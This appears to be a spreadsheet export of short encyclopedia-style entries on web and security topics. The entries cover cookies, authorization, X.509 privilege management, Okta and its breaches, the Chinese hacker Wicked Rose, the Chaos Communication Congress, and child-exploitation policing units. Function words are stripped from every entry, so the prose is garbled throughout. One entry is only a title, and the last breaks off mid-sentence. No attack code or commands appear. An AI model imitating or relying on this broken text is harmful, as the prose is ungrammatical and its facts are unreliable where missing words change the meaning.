cookie (also called cookie, internet cookie, browser cookie, simply cookie) small piece data sent website stored user's computer user's browser user browsing. cookies designed reliable mechanism websites remember stateful information (such items added shopping cart online store) record user's browsing activity (including clicking particular buttons, logging recording pages visited past). they also used remember arbitrary pieces information user previously entered form fields names, addresses, passwords, credit card numbers. cookies perform essential functions modern web. perhaps importantly, authentication cookies common method used servers know whether user logged not, account logged with. without mechanism, site would know whether send page containing sensitive information require user authenticate logging security authentication cookie generally depends security issuing website user's browser, whether cookie data encrypted. security vulnerabilities allow cookie's data read hacker, used gain access user data, used gain access (with user's credentials) website cookie belongs (see cross-site scripting cross-site request forgery examples).tracking cookies, especially third-party tracking cookies, commonly used ways compile long-term records individuals' browsing histories potential privacy concern prompted european u.s. lawmakers take action 2011. european requires websites targeting european union member states gain "informed consent" users storing non-essential cookies device. google project zero researcher jann horn describes ways cookies read intermediaries, like wi-fi hotspot providers. recommends using browser incognito mode circumstances. search engine search engine internet search engine software system designed carry search (internet search), means search world wide systematic particular information specified search query. search results generally presented line results, often referred search engine results pages (serps). information pages, images, videos, infographics, articles, research papers, types files. some search engines also mine data available databases open directories. unlike directories, maintained human editors, search engines also maintain real-time information running algorithm crawler. internet content capable searched search engine generally described deep web. deep deep web, invisible web, hidden parts world wide whose contents indexed standard search engines. opposite term deep surface web, accessible anyone using internet. computer scientist michael bergman credited coining term deep 2001 search indexing term.the content deep hidden behind http forms, includes many common uses mail, online banking, services users must for, protected paywall, video demand, online magazines newspapers, among others. content deep located accessed direct address, require password security access past public website page. caching cache server computer located either public internet within enterprise stores recently accessed pages improve response time users content requested within certain time original request. most browsers also implement browser cache writing recently obtained data local data storage device. http requests browser data changed since last access. pages resources contain expiration information control caching secure sensitive data, online banking, facilitate frequently updated sites, news media. even sites highly dynamic content permit basic resources refreshed occasionally. site designers find worthwhile collate resources data javascript site-wide files cached efficiently. enterprise firewalls often cache resources requested user benefit many users. some search engines store cached content frequently accessed websites. security criminals, become venue spread malware engage range cybercrimes, including (but limited identity theft, fraud, espionage intelligence gathering. web-based vulnerabilities outnumber traditional computer security concerns, measured google, pages contain malicious code. most web-based attacks take place legitimate websites, most, measured sophos, hosted united states, china russia. common malware threats injection attacks websites. through html uris, vulnerable attacks like cross-site scripting (xss) came introduction javascript exacerbated degree ajax design favours scripts. today estimate, websites open attacks users. phishing another common threat web. february 2013, (the security division emc) estimated global losses phishing $1.5 billion 2012. well-known phishing methods covert redirect open redirect. proposed solutions vary. large security companies like mcafee already design governance compliance suites meet post-9/11 regulations, some, like finjan recommended active real-time inspection programming code content regardless source. some argued enterprises security business opportunity rather cost centre, others call "ubiquitous, always-on digital rights management" enforced infrastructure replace hundreds companies secure data networks. jonathan zittrain said users sharing responsibility computing safety preferable locking internet. privacy every time client requests page, server identify request's address. servers usually addresses file. also, unless browsers record requested pages viewable history feature, usually cache much content locally. unless server-browser communication uses https encryption, requests responses travel plain text across internet viewed, recorded, cached intermediate systems. another hide personally identifiable information using virtual private network. encrypts online traffic masks original address lowering chance user identification. when page asks for, user supplies, personally identifiable information—such real name, address, e-mail address, etc. web-based entities associate current traffic individual. website uses http cookies, username, password authentication, tracking techniques, relate visits, after, identifiable information provided. way, web-based organization develop build profile individual people site sites. able build record individual includes information leisure activities, shopping interests, profession, aspects demographic profile. these profiles potential interest marketers, advertisers, others. depending website's terms conditions local laws apply information profiles sold, shared, passed organizations without user informed. many ordinary people, means little unexpected e-mails in-box uncannily relevant advertising future page. others, mean time spent indulging unusual interest result deluge targeted marketing unwelcome. enforcement, counter-terrorism, espionage agencies also identify, target, track individuals based interests proclivities web. social networking sites usually users real names, interests, locations, rather pseudonyms, executives believe makes social networking experience engaging users. hand, uploaded photographs unguarded statements identified individual, regret exposure. employers, schools, parents, relatives influenced aspects social networking profiles, text posts digital photos, posting individual intend audiences. online bullies make personal information harass stalk users. modern social networking websites allow fine-grained control privacy settings posting, complex easy find use, especially beginners. photographs videos posted onto websites caused particular problems, person's face online profile. with modern potential facial recognition technology, possible relate face other, previously anonymous, images, events, scenarios imaged elsewhere. image caching, mirroring, copying, difficult remove image world wide web. standards standards include many interdependent standards specifications, govern aspects internet, world wide web. even web-focused, standards directly indirectly affect development administration websites services. considerations include interoperability, accessibility usability pages sites. standards, broader sense, consist following: recommendations published world wide consortium (w3c) "living standard" made hypertext application technology working group (whatwg) request comments (rfc) documents published internet engineering task force (ietf) standards published international organization standardization (iso) standards published ecma international (formerly ecma) unicode standard various unicode technical reports (utrs) published unicode consortium name number registries maintained internet assigned numbers authority (iana)web standards fixed sets rules constantly evolving sets finalized technical specifications technologies. standards developed standards organizations—groups interested often competing parties chartered task standardization—not technologies developed declared standard single individual company. crucial distinguish specifications development ones already reached final development status case specifications, highest maturity level). accessibility there methods accessing alternative mediums formats facilitate individuals disabilities. these disabilities visual, auditory, physical, speech-related, cognitive, neurological, combination. accessibility features also help people temporary disabilities, like broken arm, ageing users abilities change. receives information well providing information interacting society. world wide consortium claims essential accessible, provide equal access equal opportunity people disabilities. berners-lee noted, "the power universality. access everyone regardless disability essential aspect." many countries regulate accessibility requirement websites. international co-operation accessibility initiative simple guidelines content authors well software developers make accessible persons using assistive technology. internationalisation internationalisation activity assures technology works languages, scripts, cultures. beginning 2004 2005, unicode gained ground eventually december 2007 surpassed ascii western european web's frequently used character encoding. originally 3986 allowed resources identified subset us-ascii. 3987 allows characters—any character universal character set—and resource identified language. also references further reading berners-lee, tim; bray, tim; connolly, dan; cotton, paul; fielding, roy; jeckle, mario; lilley, chris; mendelsohn, noah; orchard, david; walsh, norman; williams, stuart december 2004). "architecture world wide web, volume one". version 20041215. w3c. {{cite journal}}: cite journal requires |journal= (help) berners-lee, (august 1996). "the world wide web: past, present future". {{cite journal}}: cite journal requires |journal= (help) brügger, niels, web25: histories first years world wide (peter lang, 2017). fielding, gettys, mogul, frystyk, masinter, leach, berners-lee, (june 1999). "hypertext transfer protocol http/1.1". request comments 2616. information sciences institute. {{cite journal}}: cite journal requires |journal= (help) niels brügger, history (2010) pages; historical perspective world wide web, including issues culture, content, preservation. polo, luciano (2003). "world wide technology architecture: conceptual analysis". devices. skau, h.o. (march 1990). "the world wide health information". devices. external links first website early archive first site internet statistics: growth usage internet living internet comprehensive history internet, including world wide design development curlie world wide consortium (w3c) recommendations reduce "world wide wait" world wide size daily estimated size world wide antonio casilli, some elements sociology online interactions erdős webgraph server offers weekly updated graph representation constantly increasing fraction 25th anniversary world wide animated video produced usaid techchange explores role addressing extreme poverty</t>
  </si>
  <si>
    <t>Privilege Management Infrastructure</t>
  </si>
  <si>
    <t>cryptography privilege management process managing user authorisations based itu-t recommendation x.509. 2001 edition x.509 specifies (but all) components privilege management infrastructure (pmi), based x.509 attribute certificates (acs). later editions x.509 (2005 2009) added components pmi, including delegation service 2005 interdomain authorisation 2009 edition privilege management infrastructures (pmis) authorisation public infrastructures (pkis) authentication. pmis attribute certificates (acs) hold user privileges, form attributes, instead public certificates (pkcs) hold public keys. pmis sources authority (soas) attribute authorities (aas) issue users, instead certification authorities (cas) issue pkcs users. usually pmis rely underlying pki, since digitally signed issuing used validate aa's signature. x.509 generalisation well known x.509 public certificate (pkc), public replaced attributes certificate holder subject). therefore, could theory x.509 hold user's public well attribute user. similar vein, x.509 pkcs also used hold privilege attributes subject, adding subject directory attributes extension x.509 pkc). however, life cycle public keys user privileges usually different, therefore usually good idea combine certificate. similarly, authority assigns privilege someone usually different authority certifies someone's public key. therefore, usually good idea combine functions soa/aa trusted authority. pmis allow privileges authorisations managed separately keys authentication. first open source implementation x.509 built funding permis project, software available here. description implementation found in.x.509 pmis used today grids (see grid computing), assign privileges users, carry privileges around grid. popular grid privilege management system today, called voms, user privileges, shape memberships roles, placed inside x.509 voms server, signed voms server, embedded user's x.509 proxy certificate carrying around grid. because rise popularity soap based services, saml attribute assertions popular x.509 transporting user attributes. however, similar functionality, strongly bind privilege attributes user. references</t>
  </si>
  <si>
    <t>AngelHack</t>
  </si>
  <si>
    <t>angelhack american company based francisco primarily organizes hosts hackathons companies. history founded 2011, angelhack distinguished hackathon organizers coordinating global hackathons took place simultaneously different places.the company brands developer ecosystem. 2022, headed justin lists mark cuban "advisors." users angelhack says 200,000 members hosts various educational events developers. angelhack's hackathon services began corporate clients, expanded audiences, regions themes. community workshops often held bi-weekly intention helping participants build skills network colleagues. early 2022, angelhack introduced community hacks series. first community hackathon, called africa women innovation hackathon, focused technologists africa. controversies angelhack's co-founders, greg gopman, sued 2014 fellow angelhack co-founder allegedly using company's finances "elaborate vacations" thailand colombia. after leaving angelhack, gopman since garnered controversy referring homeless people francisco "hyenas." references</t>
  </si>
  <si>
    <t>Qualified Security Assessor</t>
  </si>
  <si>
    <t>qualified security assessor (qsa) designation conferred security standards council individuals meet specific information security education requirements, taken appropriate training security standards council, employees qualified security assessor (qsa) company approved security auditing firm, performing compliance assessments relate protection credit card data. term implied identify individual qualified perform payment card industry compliance auditing consulting firm itself. companies sometimes differentiated individuals initialism 'qsac'.the primary goal individual certification perform assessment firm handles credit card data high-level control objectives data security standard (pci dss). consultants holding certification must re-certify annually ensure conversant changes pci-dss requirements guidelines. references external links security standards council</t>
  </si>
  <si>
    <t>Autocall</t>
  </si>
  <si>
    <t>autocall company specializes fire protection customized communications equipment. original company founded 1908 based shelby, ohio. autocall brand became defunct 2001 incorporated simplexgrinnell merger tyco international. september 2016, johnson controls tyco completed merger, johnson controls relaunched autocall brand late 2017. early history autocall founded 1908 businessmen shelby electric company witnessed demonstration unique telegraph system plant employee communication business trip. seeing need system company, designed automatic version system founded autocall. soon after, company produced first 120vac coded fire alarm system. 1920, advertisement centered infamous triangle shirtwaist factory fire helped gain company significant business began establish serious competitor industry. 1922, company created automatic punch recorder designed record system status changes punching holes ticker tape. 1933, autocall purchased howe manufacturing company chicago, illinois used proprietary transmitter design produce autocall-howe system, high-end fire alarm system targeted large institutions industrial plants. 1960s, autocall-howe systems installed many united states' largest factories, airports, universities. innovations starting mid-1960s, autocall began transitioning fire alarm systems solid state technology. 1970, company produced series fire alarm systems utilized modular components driven printed circuit boards instead traditional hardwired relays. 1973, autocall invented first voice evacuation system, followed firefighter's communication system 1974. these technologies distributed numerous fire alarm companies produce own. 1977, autocall introduced auto monitor, entirely solid-state multiplex system utilized remote transponders distribute idc's connections. these transponders could handle points remained production several years thereafter. year later, company introduced auto command, remote microprocessor-controlled command center built-in printer. auto monitor interpreted network command centers transponders multiplex loop. shortly thereafter, company introduced custom designed rackmount systems factory programmed client. rapidly growing clientele increased complexity programs, autocall brought field programmability multiplex systems mid-1980s. 1987, autocall introduced smaller series one-loop field-programmable addressable systems burgeoning market mid-size addressable applications. 1989, autocall introduced first color touchscreen graphic annunciator, known autograph. 1990, company replaced aging auto command system al-1500, modern system capable 4,000 points. demise 1990, company bought wormald international sold company thorn security. under name "thorn/autocall", company produced tfx-series addressable panels c-series conventional panels. when thorn purchased tyco-owned grinnell 1996, systems branded "grinnell/autocall". 2001, tyco purchased simplex time recorder company merged grinnell, forming simplexgrinnell. relaunch tyco retained autocall trademark, brand name went unused tyco merged johnson controls september 2016. 2017, johnson controls relaunched autocall subsidiary brand. autocall markets complete line simplex manufactured fire protection products independent dealers. autocall, along simplex, offers addressable notification appliances known truealert these notification appliances capable reducing wiring, undergoing "self testing", strobe candela choice facp, make easy signals. this line includes regular horn/strobes, multi tone horn/strobes capable outputting frequency tone sleeping areas, outdoor signals, speaker/strobes, devices. references</t>
  </si>
  <si>
    <t>Wicked Rose</t>
  </si>
  <si>
    <t>wicked rose pseudonym chinese hacker responsible developing ginwui rootkit used internet attacks summer 2006. suggested works chinese army. beginnings dailin graduate student sichuan university noticed (for attacking japanese site) people’s liberation army (pla) summer 2005. invited participate pla-sponsored hacking contest won. subsequently participated one-month, 16-hour-per-day training program students simulated various cyber invasion methods, built dozens hacking exploits, developed various hacking tactics strategies. chosen sichuan regional team compete teams yunnan, guizhou, tibet, chongqing military district. team ranked number cash prize 20,000 rmb. network crack program hacker group then, pseudonym wicked rose, formed network crack program hacker group (ncph group) recruited talented hackers school. found funding source unknown benefactor) started attacking sites. after initial round successful attacks, funding tripled. 2006, ncph built sophisticated rootkits launched barrage attacks multiple government agencies. july, 2006, ncph created different attack variants office vulnerability. during testing phase, ncph used word document vulnerabilities. they switched excel later powerpoint vulnerabilities. result activity ncph group siphoned thousands, millions, unclassified government documents back china. references "times online article". times (subscription required).</t>
  </si>
  <si>
    <t>Angelfish software</t>
  </si>
  <si>
    <t>angelfish software on-premises, self-hosted analytics application allows organizations monitor users interact websites web-based applications. angelfish server logs javascript page tags create reports.first released 2013, angelfish software created response google's cancellation urchin perceived lack on-premises analytics software options. angelfish provides solutions tracking intranet sharepoint environments, customers include organizations required protect website visitor data regulations cannot google analytics data privacy concerns. also analytics information privacy list analytics software references external links official website http://www.analyticsmarket.com/blog/website-analytics-software-review, analytics software review.</t>
  </si>
  <si>
    <t>Authorization</t>
  </si>
  <si>
    <t>authorization function specifying access rights/privileges resources, related general information security computer security, access control particular. more formally, authorize" define access policy. example, human resources staff normally authorized access employee records policy often formalized access control rules computer system. during operation, system uses access control rules decide whether access requests (authenticated) consumers shall approved (granted) disapproved (rejected). resources include individual files item's data, computer programs, computer devices functionality provided computer applications. examples consumers computer users, computer software hardware computer. overview access control computer systems networks rely access policies. access control process divided following phases: policy definition phase access authorized, policy enforcement phase access requests approved disapproved. authorization function policy definition phase precedes policy enforcement phase access requests approved disapproved based previously defined authorizations. most modern, multi-user operating systems include role-based access control (rbac) thereby rely authorization. access control also uses authentication verify identity consumers. when consumer tries access resource, access control process checks consumer authorized resource. authorization responsibility authority, department manager, within application domain, often delegated custodian system administrator. authorizations expressed access policies types "policy definition application", e.g. form access control list capability, policy administration point e.g. xacml. basis "principle least privilege": consumers authorized access whatever need jobs. older single user operating systems often weak non-existent authentication access control systems. "anonymous consumers" "guests", consumers required authenticate. they often limited authorization. distributed system, often desirable grant access without requiring unique identity. familiar examples access tokens include keys, certificates tickets: grant access without proving identity. trusted consumers often authorized unrestricted access resources system, must verified access control system make access approval decision. "partially trusted" guests often restricted authorization order protect resources improper access usage. access policy operating systems, default, grant consumers full access resources. others opposite, insisting administrator explicitly authorizes consumer resource. even access controlled combination authentication access control lists, problems maintaining authorization data trivial, often represents much administrative burden managing authentication credentials. often necessary change remove user's authorization: done changing deleting corresponding access rules system. using atomic authorization alternative per-system authorization management, trusted third party securely distributes authorization information. related interpretations public policy public policy, authorization feature trusted systems used security social control. banking banking, authorization hold placed customer's account purchase made using debit card credit card. publishing publishing, sometimes public lectures freely available texts published without approval author. these called unauthorized texts. example 2002 'the theory everything: origin fate universe' collected stephen hawking's lectures published without permission copyright law. also references</t>
  </si>
  <si>
    <t>Chaosdorf</t>
  </si>
  <si>
    <t>chaosdorf hackspace operated non-profit association (eingetragener verein) chaos computer club düsseldorf chaosdorf e.v. city düsseldorf, germany. düsseldorf’s chaos computer club chapter. association chaosdorf operated non-profit association chaos computer club düsseldorf chaosdorf e.v. mainly financed member fees donations. membership association required take part mostly cost-free workshops meetings. purpose association creation environment adult education, modern information privacy socializing communities. history founding chaosdorf founded april 2001. their first rooms located fürstenwall düsseldorf-friedrichstadt. second hackspace after lengthy renovation process chaosdorf moved building hüttenstrasse used "rather sketchy nightclub" 2011.the space consists four rooms: large lounge/hackcenter, kitchen, media room, workshop. chaosdorf owns different kinds equipment help members fulfilling projects offering services. nationwide awareness chaosdorf known german hackspace culture organizing easterhegg 2002 first easterhegg event outside hamburg openchaos: hackerspace design patterns.it gained mainstream attention 2013 organizing large-scale street protest cologne demanding neutrality deutsche telekom announced throttle traffic.chaosdorf gained even widespread mainstream attention spiegel published story non-commercial in-house ownbeer microbrewery.on december 2013 rheinische post, major german regional daily newspaper, published page feature chaosdorf.the hackspace also supports friendly organizations forum freies theater, free software foundation europe, freifunk rheinland e.v., sub-etha providing room meetings, storage hardware, infrastructure. international awareness october 2013 members technology online magazine hack published story chaosdorf first visit german hackspace. hackspace "chaosdorf 4.0" 2020 chaosdorf moved bigger building sonnenstrasse. space provides following rooms: class room, electronic lab, lab, hackcenter, kitchen/lounge, (werkstatt). renowned members among members chaosdorf renowned people former member parliament north rhine-westphalia marc olejak pirate party germany, visual artist rachid maazouz security researchers ilias morad, alexander karl, martin dessauer. external links official website chaosdorf wiki chaosdorf github chaosdorf entry hackerspaces.org references</t>
  </si>
  <si>
    <t>World Engineering Anthropometry Resource</t>
  </si>
  <si>
    <t>world engineering anthropometry resource (wear) international not-for-profit group "provides digital platform sharing anthropometric data around world." registered europe members partners globe. made group interested experts involved application anthropometry data design purposes.” history wear first proposed 2000 international ergonomics association (iea) meeting. strategic plan drafted first working meeting paris, france 2002. first workshop seoul, korea 2003. since working meetings symposiums usa, south africa, brazil, china, australia, canada, netherlands, japan, zealand spain. wear gained support international council science (icsu): committee data science technology (codata) berlin, germany 2004. renewal wear codata task group anthropometric data engineering made 2006, 2008, 2010, 2012. first wear short course held paris 2008. website launch beta version online wear resource congress beijing 2009. wear conference adelaide 2011.to create searchable resource like wear mammoth undertaking. standardization procedure required make different anthropometric databases searchable comparable. these databases often different measurement collection methodologies, described without much detail, languages english. achieve workable standard anthropometric measurement interface (ami) created.a wear/codata meeting held november 2013 long beach, california, usa. during november 18th meeting present discussed datasets added wear portal organised future uploads. wear representatives appointed officers made plans attend codata meeting india 2014. wear’s president kathleen robinette, treasurer régis mollard secretary general daisy veitch. goals goals wear are, according members, provide high-quality data, including anthropometry, tools applications, end-users self-sustaining provide educational forum expand user-base anthropometric data design purposes." references further reading newton, david evidence forensic science, infobase publishing, york, 2008, 206, 209. niu, jianwei, zhizhong song, “block division three-dimensional head shape clustering” duffy, vincent (ed.) digital human modelling, springer-verlag, berlin heidelberg, 2009, macauley-bush, pamela, ergonomics: foundational principles, applications, technologies, press, taylor francis group, boca raton, florida, 2011, 144. niu, jianwei zhizhong, “using anthropometric data design” preedy, victor r.(ed.), handbook anthropometry: physical measures human form health disease, springer york dordrecht heidelberg london, 2012, part chpt.185, 3003. plocher, tom, rau, pei-luen patrick choong, yee-yin, “cross-cultural design” salvendy, gavriel (ed.) handbook human factors ergonomics, john wiley sons, inc., hoboken, jersey, 2012, chpt.6, 169. barbé, jérome, wolff, marion, mollard, régis, “human-centred design approach integrate touch-screen future aircraft cockpits” kurosu, masaaki (ed.) human-computer interaction: interaction modalities techniques. part springer-verlag. berlin heidelberg 2013, chapt 431. external links official website: http://www.bodysizeshape.com</t>
  </si>
  <si>
    <t>Usher (software)</t>
  </si>
  <si>
    <t>usher enterprise security platform released microstrategy, inc. 2015. technology designed replace user-entered passwords biometric identity multi-step authentication methods, features digital badges geo-fencing administration options. service takes form mobile application allows users access physical digital space based passive identification methods (facial recognition, bluetooth discovery, etc). overview usher positioned "password killer" based moving towards security credentials tied identity place. applications managed usher include salesforce.com, google apps, select microsoft software.the security features product backed usher analytics, allows administrators assess data real time identify threats behavioral abnormalities. clients organizations usher include: georgetown university 1776 saudi arabia ministry foreign affairs blackbox consultancy references external links official website</t>
  </si>
  <si>
    <t>Qualified website authentication certificate</t>
  </si>
  <si>
    <t>qualified website authentication certificate (qwac certificate) qualified digital certificate trust services defined european union eidas regulation. 2016 european union agency cybersecurity report proposed strategies twelve recommended actions escalated approach targets important aspects viewed critical improving website authentication market europe successfully introducing qualified website authentication certificates means increase transparency market. qwac context standards there different types website authentication certificates, distinguished content contained within subject certificate: domain validated (dv), organization validated (ov) extended validation (ev). another distinction made number domains secured certificate: single domain, wildcard, multi domain. extended validation certificates distinct issuance policies, requiring enhanced level certificate subscriber identity verification prescribed ca/browser forum, thus highest level identity assurance certificates marketplace. certificate requirements". cabf. certificate distinguished browser presence green address bar, green text, presence legal business name depending browser used. research conducted google berkeley identified users notably alter behavior based presence absence indicators. results research motivated google, commanded significant browser market share, discontinue differentiation different certificate types. approached cabf 2018 requesting partner updating existing requirements include additional subject information within certificate. google, followed browsers, already process deprecating indication discouraged using certificates. 2019 major browsers longer strong indication certificates. most financial institutions continue certificates. with reluctance browsers modify existing requirements accommodate eidas identifying information, eidas regulators began introducing parallel security structure relying government certification trust service providers (tsps). this would exist alongside existing multi-stakeholder certificate authority (ca) system. parallel security structure gives concern industry stakeholders identified risks approach, mostly around government mandated governance, raised concerns implementation would undermine privacy individuals web. eidas regulation eidas regulation trust services defined electronic services, normally provided tsps, consist electronic signatures, electronic seals, electronic time stamps, electronic registered delivery services website authentication.in essence, eidas regulation provides framework promote: transparency accountability: well-defined minimal obligations tsps liability. guarantee trustworthiness services together security requirements tsps. technological neutrality: avoiding requirements could specific technology. market rules standardization certainty. content website authentication certificates five trust service defined eidas regulation. article sets requirement trust service providers issuing qualified website authentication certificates qualified, implies requirements qualified trust service providers (qtsps) described previous section applicable. annex defines content qualified certificates website authentication: criticism updates eidas proposed 2021 require browsers provide forms assurance website authenticity without specifying exactly how. they require browsers like chrome, safari, firefox incorporate list government-specified "trusted service providers", accept "displayed user friendly manner" qwacs tsps issue, despite variety trust, legal, technical security concerns. internet society mozilla requirements regulation require violating requirements. they also assert would undermine technical neutrality interoperability, undermine privacy users, create dangerous security risks. they suggest instead continuing build existing framework. references</t>
  </si>
  <si>
    <t>Chaos Communication Congress</t>
  </si>
  <si>
    <t>chaos communication congress annual conference organized chaos computer club. congress features variety lectures workshops technical political issues related security, cryptography, privacy online freedom speech. taken place regularly year since 1984, 2021 date duration (27–30 december) established 2005. considered largest events kind, alongside vegas. history congress held germany. started 1984 hamburg, moved berlin 1998, back hamburg 2012, exceeded capacity berlin venue 4500 attendees. since then, attracts increasing number people: around 6600 attendees 2012, 13000 2015, 15000 2017. since 2017 taken place trade fair grounds leipzig, since hamburg venue closed renovation 2017 existing space enough growing congress. large range speakers featured. event organized volunteers called chaos angels. non-members entry four days €100 2016, raised €120 2018 include public transport ticket leipzig area.an important part congress assemblies, semi-open spaces clusters tables internet connections groups individuals collaborate socialize projects, workshops hands-on talks. these assembly spaces, introduced 2012 meeting, combine hack center project space distributed group spaces former years.from 1997 2004 congress also hosted annual german lockpicking championships. 2005 first year congress lasted four days instead three lacked german lockpicking championships. 2020 first year congress take place physical location covid-19 pandemic, giving first remote chaos experience (rc3).the chaos computer club announced return newly renovated congress center hamburg 37th edition chaos communication congress. announcement confirms usual date 27-30 december, notably omitting year held. congresses 1984 today gallery also chaos communication camp sigint notes references external links overview chaos communication congresses blog chaos communication congress (and events)</t>
  </si>
  <si>
    <t>Okta, Inc.</t>
  </si>
  <si>
    <t>okta, inc. (formerly saasure inc.) american identity access management company based francisco. provides cloud software helps companies manage secure user authentication applications, developers build identity controls applications, website services devices. founded 2009 initial public offering 2017, valued billion. products services okta sells products, including single sign-on, universal directory, advanced server access (formerly scaleft), access management, authentication, user management, integration, multi-factor authentication, lifecycle management, access gateway. okta sells services, including single sign-on service allows users variety systems using centralized process. example, company claims ability gmail, workday, salesforce slack login. also offers authentication services.okta's services built amazon services cloud.okta primarily targets enterprise businesses. claimed customers 2020 include zoominfo, jetblue, nordstrom, resorts international, u.s. department justice.okta runs annual “oktane” user conference, 2018 featured former president barack obama keynote speaker. operations okta headquartered francisco. also offices jose, bellevue, toronto, washington d.c., london, amsterdam, sydney, paris, stockholm. history okta co-founded 2009 todd mckinnon frederic kerrest, previously worked together salesforce.in 2015, company raised us$75 million venture capital andreessen horowitz, greylock partners, sequoia capital, total initial valuation us$1.2 billion.in 2017, okta's initial public offering priced $17.00 share, trading first day, raise additional us$187 million. time ipo, sequoia capital biggest shareholder, 21.2 percent stake.in january 2019, okta's announced company million registered users.in august 2020, okta announced plans employees work remotely permanent basis result covid-19 pandemic.in march 2021, okta signed definitive agreement acquire auth0 $6.5 billion. deal closed 2021. security incidents march 2021, hacking collective "advanced persistent threat 69420" breached okta office network security failure company's verkada camera setup. they able download security footage cameras. member group, tillie kottmann, also revealed group gained root shell access network. blog post next day, okta chief security officer david bradbury minimized root shell "internal support tool" camera manufacturer verkada. however, shell would given hackers full access commands network, cloudflare admitted identical hack group company's network given level access. bradbury also said threat contained isolated network. march 2022, hacking group lapsus$ posted screenshots claiming okta internal systems. next day, okta concluded maximum customers data potentially impacted, stating breach originated computer used okta's third-party customer support engineers hackers access. references external links official website business data okta, inc.:</t>
  </si>
  <si>
    <t>Chatterbox Challenge</t>
  </si>
  <si>
    <t>Authentication and authorization infrastructure</t>
  </si>
  <si>
    <t>authentication authorization infrastructure (aai) refers service procedure enables members different institutions access protected information distributed different servers. traditional approaches authorization access control computer systems sufficient address requirements federated distributed systems, infrastructural support required. authentication authorization infrastructure solutions address limitations. with aai, access control managed central register, respective organization user wishes access specific resource.in switzerland, switch information technology services foundation developing shibboleth-based system helps swiss universities particular make e-learning offers accessible students beyond institutional boundaries. based success switchaai, countries following projects. projects switchaai, switzerland eosc-hub aai, european union garr idem aai, italy grnet aai, greece dfn-aai, germany elixir aai, cstcloud aai, china also authentication authorization infrastructure service (iaas) identity service (idaas) identity management federated identity shibboleth single sign-on architecture central authentication service keycloak openathens list single sign-on implementations references</t>
  </si>
  <si>
    <t>Authentication server</t>
  </si>
  <si>
    <t>authentication server provides network service applications authenticate credentials, usually account names passwords, users. when client submits valid credentials, receives cryptographic ticket subsequently access various services. authentication used basis authorization, determination whether privilege granted particular user process, privacy, keeps information becoming known non-participants, non-repudiation, inability deny done something authorized done based authentication. major authentication algorithms include passwords, kerberos, public encryption. also tacacs+ radius multi-factor authentication universal factor references</t>
  </si>
  <si>
    <t>Woopra</t>
  </si>
  <si>
    <t>woopra customer analytics service intended assist orginizations developing marketing techniques. press 2009, daniel brusilovski techcrunch called woopra "impressive live tracking analytics service". readwriteweb named woopra product 2010 gave honorable mention 2011. readwriteweb's founder, richard macmanus, says woopra "without doubt addictive business tool use." 2012, eweek listed woopra "hot analytics" company american express open forum listed "smartest analytics tools". business community, 2012, cites woopra's real time analytics useful adjunct google analytics. also list analytics software references external links woopra.com</t>
  </si>
  <si>
    <t>Child Exploitation Tracking System</t>
  </si>
  <si>
    <t>child exploitation tracking system (cets) microsoft software based solution assists managing linking worldwide cases related child protection. cets developed collaboration enforcement canada. administered loose partnership microsoft enforcement agencies, cets offers tools gather share evidence information identify, prevent punish commit crimes children. about cets partnership 2003, detective sergeant paul gillespie, officer charge child exploitation section toronto police service's crimes unit, made request directly bill gates, chief architect microsoft time, assistance types crimes. agencies experienced tracking apprehending perpetrate crimes involved design, implementation, policy. solution needed assist enforcement agencies initial point detection, investigative phase, arrest, prosecution, conviction criminal. addition, imperative solution adhered existing rights civil liberties citizens various countries. this included remaining independent internet traffic individual user’s computer. finally, solution needed global nature enable collaboration among nations agencies. order increase effectiveness investigators worldwide, system would allow enforcement entities collect evidence online child exploitation gathered multiple enforcement agencies. organize store information safely securely. search database information. securely share information agencies, across jurisdictions. analyze information provide pertinent matches. adhere global software industry standards. enforcement partnerships worldwide number enforcement agencies deploying cets tool, include: australia: high tech crime centre brazil: federal police canada: royal canadian mounted police, toronto police services crime unit, twenty-six canadian police services chile: national investigative police indonesia: national police italy: ministry interior postal police romania: national police spain: interior ministry united kingdom: child exploitation online protection command national crime agency. united states: department homeland security federal bureau investigation planning poland, argentina united arab emirateschild exploitation crimes increasing problem technology advances. tracking system proven success rate bringing many violate justice. microsoft contributed technology creating ncmec furthered development system captures criminals addition removing offensive images. "microsoft implemented photodna online properties including bing, onedrive (previously known skydrive) hotmail, already resulted identification, reporting removal thousands images child pornography" (microsoft, 2013). microsoft. "child exploitation crimes." microsoft. n.p., 2013. web. microsoft large contributor toward efforts online surveillance broken walls online anonymity. also microsoft litigation national cyber security awareness month notes references external links international centre missing exploited children kids' internet safety alliance (kinsa) child exploitation tracking system australian criminal intelligence commission</t>
  </si>
  <si>
    <t>Child Exploitation and Online Protection Command</t>
  </si>
  <si>
    <t>child exploitation online protection command, ceop command, command uk's national crime agency (nca), tasked work nationally internationally bring online child offenders, including involved production, distribution viewing child abuse material, courts. centre formed april 2006 child exploitation online protection centre, absorbed october 2013 crime courts 2013. purpose operations ceop combines police powers expertise business sector, government, specialist charities interested organisations. partners ceop made police officers specialist experience tracking prosecuting offenders, working people organisations including nspcc childnet, microsoft aol. partnerships across non-government bodies, including: action children, nspcc, barnardos; business (microsoft, aol, serco, vodafone etc.) government departments (department education; home office; foreign commonwealth office etc.). ceop works organisations scout association, football association, england wales cricket board, lycos widen scope work. budget ceop's home office funding frozen 2010 reduced subsequent three years. staff numbers increased period according ceop, though former employees dispute this. 2012–13 budget million posts, included seconded police officers. additional money resources came nspcc, google, microsoft systems detica. global work ceop centre also partner international enforcement alliance virtual global taskforce. this 2004 provides international alliance enforcement agencies across australia, canada well interpol bringing global policing response censoring internet. faculties centre split three faculties; intelligence, harm reduction operations. each faculty supported teams covering governance, communications, partnerships corporate services. intelligence faculty receive intelligence online offline offenders; reports made centre's website, thinkuknow dealt time enforcement action taken. harm reduction faculty manage public awareness campaigns educational programmes, including thinkuknow education programme, currently used schools. operations faculty aims tackle abusers exploit children financial gain. browser integration available ceop browser extension firefox, google chrome customised internet explorer. director johnny gwynne director nca-ceop. before joining johnny serving chief officer police scotland previously deputy director general scottish crime drug enforcement agency. seconded june 2013 deputy director organised crime command competing appointed role director ceop command. previous heads ceop include gamble peter davies. prosecutions ceop gained first successful prosecution june 2006, costi, haslemere, surrey, sentenced nottingham crown court admitted grooming schoolgirls sex, well possession indecent images children. costi caught nottingham girl told mother chatroom messages. judge jonathan teare sentenced costi total nine years prison.following this, june 2007, timothy jailed court buxhall, suffolk, following 10-month operation ceop officers, well virtual global taskforce members, leading suspects followed enforcement agencies around world.the ceop claims disrupted dismantled sex-offender networks 2006 2010, says inquiries online investigators 1,000 arrests period. independent police complaints commission (ipcc) investigation september 2015, gross 